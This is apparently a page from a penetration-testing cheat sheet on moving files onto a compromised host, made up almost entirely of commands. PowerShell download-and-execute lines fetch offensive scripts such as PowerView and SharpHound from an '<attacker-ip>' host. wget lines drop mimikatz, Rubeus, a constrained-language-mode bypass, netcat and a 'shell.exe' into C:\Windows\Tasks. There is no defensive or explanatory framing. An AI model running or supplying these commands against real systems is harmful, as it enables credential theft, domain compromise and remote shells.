File transfer

Imports

IEX

IEX (New-Object Net.WebClient).DownloadString('http://<attacker-ip>/Powermad.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://<attacker-ip>/PowerUpSQL.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://<attacker-ip>/PowerView.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://<attacker-ip>/SharpHound.ps1')
powershell (new-object system.net.webclient).downloadstring('http://<attacker-ip>/HostRecon.ps1') | IEX

Import-Module

cd c:\windows\tasks
. .\PowerView.ps1

wget

wget http://<attacker-ip>/CLMBypass.exe -OutFile C:\Windows\Tasks\CLMBypass.exe
wget http://<attacker-ip>/mimikatz.exe -OutFile C:\Windows\Tasks\mimikatz.exe
wget http://<attacker-ip>/mimidrv.sys -OutFile C:\Windows\Tasks\mimidrv.sys
wget http://<attacker-ip>/linpeas.sh -O /tmp/linpeas.sh
wget http://<attacker-ip>/Powermad.ps1 -OutFile C:\Windows\Tasks\Powermad.ps1
wget http://<attacker-ip>/PowerView.ps1 -OutFile C:\Windows\Tasks\PowerView.ps1
wget http://<attacker-ip>/PsExec.exe -OutFile C:\Windows\Tasks\PsExec.exe
wget http://<attacker-ip>/Rubeus.exe -OutFile C:\Windows\Tasks\Rubeus.exe
wget http://<attacker-ip>/Seatbelt.exe -OutFile C:\Windows\Tasks\Seatbelt.exe 
wget http://<attacker-ip>/SharpHound.exe -OutFile C:\Windows\Tasks\SharpHound.exe
wget http://<attacker-ip>/shell.exe -OutFile C:\Windows\Tasks\shell.exe
wget http://<attacker-ip>/SpoolSample.exe -OutFile C:\Windows\Tasks\SpoolSample.exe
wget http://<attacker-ip>/netcat.bat -OutFile C:\Windows\Tasks\netcat.bat
wget http://<attacker-ip>/nc.exe -OutFile C:\Windows\Tasks\nc.exe

Uploads

Downloads

PreviousAV EvasionNextExfiltrate Data

Last updated

Was this helpful?